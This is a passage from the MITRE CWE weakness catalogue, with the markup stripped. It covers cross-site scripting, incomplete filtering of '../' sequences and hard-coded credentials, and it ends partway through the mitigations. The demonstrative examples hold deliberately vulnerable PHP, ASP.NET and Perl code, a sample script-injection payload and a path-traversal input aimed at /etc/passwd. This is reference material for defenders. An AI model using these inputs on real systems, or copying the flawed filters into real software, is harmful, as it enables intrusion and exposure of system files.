System.Web.UI.WebControls.Label EmployeeName;...string query = "select * from emp where id=" + eid;sda = new SqlDataAdapter(query, conn);sda.Fill(dt);string name = dt.Rows[0]["Name"];...EmployeeName.Text = name;%><p><asp:label id="EmployeeName" runat="server" /></p> + + This code can appear less dangerous because the value of name is read from a database, whose contents are apparently managed by the application. However, if the value of name originates from user-supplied data, then the database can be a conduit for malicious content. Without proper input validation on all data stored in the database, an attacker can execute malicious commands in the user's web browser. + + + The following code consists of two separate pages in a web application, one devoted to creating user accounts and another devoted to listing active users currently logged in. It also displays a Stored XSS (Type 2) scenario. + CreateUser.php + + $username = mysql_real_escape_string($username);$fullName = mysql_real_escape_string($fullName);$query = sprintf('Insert Into users (username,password) Values ("%s","%s","%s")', $username, crypt($password),$fullName) ;mysql_query($query);/.../ + + The code is careful to avoid a SQL injection attack (CWE-89) but does not stop valid HTML from being stored in the database. This can be exploited later when ListUsers.php retrieves the information: + ListUsers.php + + $query = 'Select * From users Where loggedIn=true';$results = mysql_query($query); + if (!$results) {exit;} + + //Print list of users to page + echo '<div id="userlist">Currently Active Users:';while ($row = mysql_fetch_assoc($results)) {echo '<div class="userNames">'.$row['fullname'].'</div>';}echo '</div>'; + + The attacker can set their name to be arbitrary HTML, which will then be displayed to all visitors of the Active Users page. This HTML can, for example, be a password stealing Login message. + + + The following code is a simplistic message board that saves messages in HTML format and appends them to a file. When a new user arrives in the room, it makes an announcement: + + $name = $_COOKIE["myname"];$announceStr = "$name just logged in."; + + //save HTML-formatted message to file; implementation details are irrelevant for this example. + + saveMessage($announceStr); + + An attacker may be able to perform an HTML injection (Type 2 XSS) attack by setting a cookie to a value like: + + <script>document.alert('Hacked');</script> + + The raw contents of the message file would look like: + + <script>document.alert('Hacked');</script> has logged in. + + For each person who visits the message page, their browser would execute the script, generating a pop-up window that says "Hacked". More malicious attacks are possible; see the rest of this entry. + + + + + CVE-2021-25926 + Python Library Manager did not sufficiently neutralize a user-supplied search term, allowing reflected XSS. + https://www.cve.org/CVERecord?id=CVE-2021-25926 + + + CVE-2021-25963 + Python-based e-commerce platform did not escape returned content on error pages, allowing for reflected Cross-Site Scripting attacks. + https://www.cve.org/CVERecord?id=CVE-2021-25963 + + + CVE-2021-1879 + Universal XSS in mobile operating system, as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2021-1879 + + + CVE-2020-3580 + Chain: improper input validation (CWE-20) in firewall product leads to XSS (CWE-79), as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2020-3580 + + + CVE-2014-8958 + Admin GUI allows XSS through cookie. + https://www.cve.org/CVERecord?id=CVE-2014-8958 + + + CVE-2017-9764 + Web stats program allows XSS through crafted HTTP header. + https://www.cve.org/CVERecord?id=CVE-2017-9764 + + + CVE-2014-5198 + Web log analysis product allows XSS through crafted HTTP Referer header. + https://www.cve.org/CVERecord?id=CVE-2014-5198 + + + CVE-2008-5080 + Chain: protection mechanism failure allows XSS + https://www.cve.org/CVERecord?id=CVE-2008-5080 + + + CVE-2006-4308 + Chain: incomplete denylist (CWE-184) only checks "javascript:" tag, allowing XSS (CWE-79) using other tags + https://www.cve.org/CVERecord?id=CVE-2006-4308 + + + CVE-2007-5727 + Chain: incomplete denylist (CWE-184) only removes SCRIPT tags, enabling XSS (CWE-79) + https://www.cve.org/CVERecord?id=CVE-2007-5727 + + + CVE-2008-5770 + Reflected XSS using the PATH_INFO in a URL + https://www.cve.org/CVERecord?id=CVE-2008-5770 + + + CVE-2008-4730 + Reflected XSS not properly handled when generating an error message + https://www.cve.org/CVERecord?id=CVE-2008-4730 + + + CVE-2008-5734 + Reflected XSS sent through email message. + https://www.cve.org/CVERecord?id=CVE-2008-5734 + + + CVE-2008-0971 + Stored XSS in a security product. + https://www.cve.org/CVERecord?id=CVE-2008-0971 + + + CVE-2008-5249 + Stored XSS using a wiki page. + https://www.cve.org/CVERecord?id=CVE-2008-5249 + + + CVE-2006-3568 + Stored XSS in a guestbook application. + https://www.cve.org/CVERecord?id=CVE-2006-3568 + + + CVE-2006-3211 + Stored XSS in a guestbook application using a javascript: URI in a bbcode img tag. + https://www.cve.org/CVERecord?id=CVE-2006-3211 + + + CVE-2006-3295 + Chain: library file is not protected against a direct request (CWE-425), leading to reflected XSS (CWE-79). + https://www.cve.org/CVERecord?id=CVE-2006-3295 + + + + + Cross-site scripting (XSS) + + + Cross-site Scripting + + + Cross-site scripting + + + A1 + Cross Site Scripting (XSS) + Exact + + + A1 + Unvalidated Input + CWE More Specific + + + A4 + Cross-Site Scripting (XSS) Flaws + Exact + + + 8 + Cross-site Scripting + + + SFP24 + Tainted input to command + + + ASCSM-CWE-79 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + There can be a close relationship between XSS and CSRF (CWE-352). An attacker might use CSRF in order to trick the victim into submitting requests to the server in which the requests contain an XSS payload. A well-known example of this was the Samy worm on MySpace [REF-956]. The worm used XSS to insert malicious HTML sequences into a user's profile and add the attacker as a MySpace friend. MySpace friends of that victim would then execute the payload to modify their own profiles, causing the worm to propagate exponentially. Since the victims did not intentionally insert the malicious script themselves, CSRF was a root cause. + + + XSS flaws are very common in web applications, since they require a great deal of developer discipline to avoid them. + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + 1.0 + 2008-09-09 + updated Time_of_Introduction + + + Veracode + 2008-08-15 + 1.0 + 2008-09-09 + Suggested OWASP Top Ten 2004 mapping + + + CWE Content Team + MITRE + 2008-09-08 + updated Alternate_Terms, Applicable_Platforms, Background_Details, Common_Consequences, Description, Relationships, Other_Notes, References, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-01-12 + updated Alternate_Terms, Applicable_Platforms, Background_Details, Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Enabling_Factors_for_Exploitation, Name, Observed_Examples, Other_Notes, Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2009-03-10 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2009-05-27 + updated Name + + + CWE Content Team + MITRE + 2009-07-27 + updated Description + + + CWE Content Team + MITRE + 2009-10-29 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2009-12-28 + updated Demonstrative_Examples, Description, Detection_Factors, Enabling_Factors_for_Exploitation, Observed_Examples + + + CWE Content Team + MITRE + 2010-02-16 + updated Applicable_Platforms, Detection_Factors, Potential_Mitigations, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-04-05 + updated Description, Potential_Mitigations, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-06-21 + updated Common_Consequences, Description, Name, Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2010-09-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Demonstrative_Examples, References + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-09-13 + updated Detection_Factors, Potential_Mitigations + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-07-17 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-05-03 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Causal_Nature, Demonstrative_Examples, Enabling_Factors_for_Exploitation, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Alternate_Terms, Demonstrative_Examples, Description, Observed_Examples, References, Relationship_Notes, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-09-19 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Observed_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples, Description + + + CWE Content Team + MITRE + 2021-07-20 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-06-28 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Background_Details, Observed_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Alternate_Terms, Demonstrative_Examples, Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + Cross-site Scripting (XSS) + Failure to Sanitize Directives in a Web Page (aka 'Cross-site scripting' (XSS)) + Failure to Preserve Web Page Structure (aka 'Cross-site Scripting') + Failure to Preserve Web Page Structure ('Cross-site Scripting') + + + + The product receives data from an upstream component, but does not filter or incorrectly filters special elements before sending it to a downstream component. + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Integrity + Unexpected State + + + + + The following code takes untrusted input and uses a regular expression to filter "../" from the input. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path. + + my $Username = GetUntrustedInput();$Username =~ s/\.\.\///;my $filename = "/home/user/" . $Username;ReadAndSendFile($filename); + + Since the regular expression does not have the /g global match modifier, it only removes the first instance of "../" it comes across. So an input value such as: + + ../../../etc/passwd + + will have the first "../" stripped, resulting in: + + ../../etc/passwd + + This value is then concatenated with the /home/user/ directory: + + /home/user/../../etc/passwd + + which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-23). + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + CWE Content Team + MITRE + 2009-12-04 + 1.7 + 2009-12-28 + + + CWE Content Team + MITRE + 2010-02-16 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product receives data from an upstream component, but does not completely filter special elements before sending it to a downstream component. + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Integrity + Unexpected State + + + + + The following code takes untrusted input and uses a regular expression to filter "../" from the input. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path. + + my $Username = GetUntrustedInput();$Username =~ s/\.\.\///;my $filename = "/home/user/" . $Username;ReadAndSendFile($filename); + + Since the regular expression does not have the /g global match modifier, it only removes the first instance of "../" it comes across. So an input value such as: + + ../../../etc/passwd + + will have the first "../" stripped, resulting in: + + ../../etc/passwd + + This value is then concatenated with the /home/user/ directory: + + /home/user/../../etc/passwd + + which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-23). + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2009-12-04 + 1.7 + 2009-12-28 + + + CWE Content Team + MITRE + 2010-02-16 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product receives data from an upstream component, but does not completely filter one or more instances of special elements before sending it to a downstream component. + + Incomplete filtering of this nature involves either: + + only filtering a single instance of a special element when more exist, or + not filtering all instances or all elements where multiple special elements exist. + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Integrity + Unexpected State + + + + + The following code takes untrusted input and uses a regular expression to filter "../" from the input. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path. + + my $Username = GetUntrustedInput();$Username =~ s/\.\.\///;my $filename = "/home/user/" . $Username;ReadAndSendFile($filename); + + Since the regular expression does not have the /g global match modifier, it only removes the first instance of "../" it comes across. So an input value such as: + + ../../../etc/passwd + + will have the first "../" stripped, resulting in: + + ../../etc/passwd + + This value is then concatenated with the /home/user/ directory: + + /home/user/../../etc/passwd + + which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-23). + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2009-12-04 + 1.7 + 2009-12-28 + + + CWE Content Team + MITRE + 2010-02-16 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2010-06-21 + updated Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product receives data from an upstream component, but only filters a single instance of a special element before sending it to a downstream component. + Incomplete filtering of this nature may be location-dependent, as in only the first or last element is filtered. + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Integrity + Unexpected State + + + + + The following code takes untrusted input and uses a regular expression to filter "../" from the input. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path. + + my $Username = GetUntrustedInput();$Username =~ s/\.\.\///;my $filename = "/home/user/" . $Username;ReadAndSendFile($filename); + + Since the regular expression does not have the /g global match modifier, it only removes the first instance of "../" it comes across. So an input value such as: + + ../../../etc/passwd + + will have the first "../" stripped, resulting in: + + ../../etc/passwd + + This value is then concatenated with the /home/user/ directory: + + /home/user/../../etc/passwd + + which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-23). + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2009-12-04 + 1.7 + 2009-12-28 + + + CWE Content Team + MITRE + 2010-02-16 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product receives data from an upstream component, but does not filter all instances of a special element before sending it to a downstream component. + + Incomplete filtering of this nature may be applied to: + + sequential elements (special elements that appear next to each other) or + non-sequential elements (special elements that appear multiple times in different locations). + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Integrity + Unexpected State + + + + + The following code takes untrusted input and uses a regular expression to filter "../" from the input. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path. + + my $Username = GetUntrustedInput();$Username =~ s/\.\.\///;my $filename = "/home/user/" . $Username;ReadAndSendFile($filename); + + Since the regular expression does not have the /g global match modifier, it only removes the first instance of "../" it comes across. So an input value such as: + + ../../../etc/passwd + + will have the first "../" stripped, resulting in: + + ../../etc/passwd + + This value is then concatenated with the /home/user/ directory: + + /home/user/../../etc/passwd + + which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-23). + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2009-12-04 + 1.7 + 2009-12-28 + + + CWE Content Team + MITRE + 2010-02-16 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2010-06-21 + updated Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product receives data from an upstream component, but only accounts for special elements at a specified location, thereby missing remaining special elements that may exist before sending it to a downstream component. + + A filter might only account for instances of special elements when they occur: + + relative to a marker (e.g. "at the beginning/end of string; the second argument"), or + at an absolute position (e.g. "byte number 10"). + + This may leave special elements in the data that did not match the filter position, but still may be dangerous. + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Integrity + Unexpected State + + + + + The following code takes untrusted input and uses a regular expression to filter a "../" element located at the beginning of the input string. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path. + + my $Username = GetUntrustedInput();$Username =~ s/^\.\.\///;my $filename = "/home/user/" . $Username;ReadAndSendFile($filename); + + Since the regular expression is only looking for an instance of "../" at the beginning of the string, it only removes the first "../" element. So an input value such as: + + ../../../etc/passwd + + will have the first "../" stripped, resulting in: + + ../../etc/passwd + + This value is then concatenated with the /home/user/ directory: + + /home/user/../../etc/passwd + + which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-22). + + + The following code takes untrusted input and uses a substring function to filter a 3-character "../" element located at the 0-index position of the input string. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path. + + my $Username = GetUntrustedInput();if (substr($Username, 0, 3) eq '../') {$Username = substr($Username, 3);}my $filename = "/home/user/" . $Username;ReadAndSendFile($filename); + + Since the if function is only looking for a substring of "../" between the 0 and 2 position, it only removes that specific "../" element. So an input value such as: + + ../../../etc/passwd + + will have the first "../" filtered, resulting in: + + ../../etc/passwd + + This value is then concatenated with the /home/user/ directory: + + /home/user/../../etc/passwd + + which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-22). + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2009-12-04 + 1.7 + 2009-12-28 + + + CWE Content Team + MITRE + 2010-06-21 + updated Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product receives data from an upstream component, but only accounts for special elements positioned relative to a marker (e.g. "at the beginning/end of a string; the second argument"), thereby missing remaining special elements that may exist before sending it to a downstream component. + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Integrity + Unexpected State + + + + + The following code takes untrusted input and uses a regular expression to filter a "../" element located at the beginning of the input string. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path. + + my $Username = GetUntrustedInput();$Username =~ s/^\.\.\///;my $filename = "/home/user/" . $Username;ReadAndSendFile($filename); + + Since the regular expression is only looking for an instance of "../" at the beginning of the string, it only removes the first "../" element. So an input value such as: + + ../../../etc/passwd + + will have the first "../" stripped, resulting in: + + ../../etc/passwd + + This value is then concatenated with the /home/user/ directory: + + /home/user/../../etc/passwd + + which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-22). + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2009-12-04 + 1.7 + 2009-12-28 + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product receives data from an upstream component, but only accounts for special elements at an absolute position (e.g. "byte number 10"), thereby missing remaining special elements that may exist before sending it to a downstream component. + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Integrity + Unexpected State + + + + + The following code takes untrusted input and uses a substring function to filter a 3-character "../" element located at the 0-index position of the input string. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path. + + my $Username = GetUntrustedInput();if (substr($Username, 0, 3) eq '../') {$Username = substr($Username, 3);}my $filename = "/home/user/" . $Username;ReadAndSendFile($filename); + + Since the if function is only looking for a substring of "../" between the 0 and 2 position, it only removes that specific "../" element. So an input value such as: + + ../../../etc/passwd + + will have the first "../" filtered, resulting in: + + ../../etc/passwd + + This value is then concatenated with the /home/user/ directory: + + /home/user/../../etc/passwd + + which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-22). + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2009-12-04 + 1.7 + 2009-12-28 + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data. + + Hard-coded credentials typically create a significant hole that allows an attacker to bypass the authentication that has been configured by the product administrator. This hole might be difficult for the system administrator to detect. Even if detected, it can be difficult to fix, so the administrator may be forced into disabling the product entirely. There are two main variations: + + Inbound: the product contains an authentication mechanism that checks the input credentials against a hard-coded set of credentials. + Outbound: the product connects to another system or component, and it contains hard-coded credentials for connecting to that component. + + In the Inbound variant, a default administration account is created, and a simple password is hard-coded into the product and associated with that account. This hard-coded password is the same for each installation of the product, and it usually cannot be changed or disabled by system administrators without manually modifying the program, or otherwise patching the product. If the password is ever discovered or published (a common occurrence on the Internet), then anybody with knowledge of this password can access the product. Finally, since all installations of the product will have the same password, even across different organizations, this enables massive attacks such as worms to take place. + The Outbound variant applies to front-end systems that authenticate with a back-end service. The back-end service may require a fixed password which can be easily discovered. The programmer may simply hard-code those back-end credentials into the front-end product. Any user of that program may be able to extract the password. Client-side systems with hard-coded passwords pose even more of a threat, since the extraction of a password from a binary is usually very simple. + + + + + + + + + + + Primary + + + + + + + + + + Architecture and Design + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + High + + + Access Control + Bypass Protection Mechanism + If hard-coded passwords are used, it is almost certain that malicious users will gain access to the account in question. + + + Integrity + Confidentiality + Availability + Access Control + Other + Read Application Data + Gain Privileges or Assume Identity + Execute Unauthorized Code or Commands + Other + This weakness can lead to the exposure of resources or functionality to unintended actors, possibly providing attackers with sensitive information or even execute arbitrary code. + + + + + Black Box + Credential storage in configuration files is findable using black box methods, but the use of hard-coded credentials for an incoming authentication routine typically involves an account that is not visible outside of the code. + Moderate + + + Automated Static Analysis + Automated white box techniques have been published for detecting hard-coded credentials for incoming authentication, but there is some expert disagreement regarding their effectiveness and applicability to a broad range of methods. + + + Manual Static Analysis + This weakness may be detectable using manual code analysis. Unless authentication is decentralized and applied throughout the product, there can be sufficient time for the analyst to find incoming authentication routines and examine the program logic looking for usage of hard-coded credentials. Configuration files could also be analyzed. + These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. + + + Manual Dynamic Analysis + + For hard-coded credentials in incoming authentication: use monitoring tools that examine the product's process as it interacts with the operating system and the network. This technique is useful in cases when source code is unavailable, if the product was not developed by you, or if you want to verify that the build phase did not introduce any new weaknesses. Examples include debuggers that directly attach to the running process; system-call tracing utilities such as truss (Solaris) and strace (Linux); system activity monitors such as FileMon, RegMon, Process Monitor, and other Sysinternals utilities (Windows); and sniffers and protocol analyzers that monitor network traffic. + Attach the monitor to the process and perform a login. Using call trees or similar artifacts from the output, examine the associated behaviors and see if any of them appear to be comparing the input to a fixed string or value. + + + + Automated Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Bytecode Weakness Analysis - including disassembler + source code weakness analysis + Binary Weakness Analysis - including disassembler + source code weakness analysis + + + + SOAR Partial + + + Manual Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies + + + + High + + + Dynamic Analysis with Manual Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Network Sniffer + Forced Path Execution + + + + SOAR Partial + + + Manual Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Focused Manual Spotcheck - Focused manual analysis of source + Manual Source Code Review (not inspections) + + + + High + + + Automated Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Source code Weakness Analyzer + Context-configured Source Code Weakness Analyzer + + + + High + + + Automated Static Analysis + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Configuration Checker + + + + SOAR Partial + + + Architecture or Design Review + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) + Formal Methods / Correct-By-Construction + + + + High + + + + + Architecture and Design + + For outbound authentication: store passwords, keys, and other credentials outside of the code in a strongly-protected, encrypted configuration file or database that is protected from access by all outsiders, including other local users on the same system. Properly protect the key (CWE-320). If you cannot use encryption to protect the file, then make sure that the permissions are as restrictive as possible [REF-7]. + In Windows environments, the Encrypted File System (EFS) may provide some protection. + + + + Architecture and Design + For inbound authentication: Rather than hard-code a default username and password, key, or other authentication credentials for first time logins, utilize a "first login" mode that requires the user to enter a unique strong password or key. + + + Architecture and Design + If the product must contain hard-coded credentials or they cannot be removed, perform access control checks and limit which entities can access the feature that requires the hard-coded credentials. For example, a feature might only be enabled through the system console instead of through a network connection. + + + Architecture and Design + + For inbound authentication using passwords: apply strong one-way hashes to passwords and store those hashes in a configuration file or database with appropriate access control. That way, theft of the 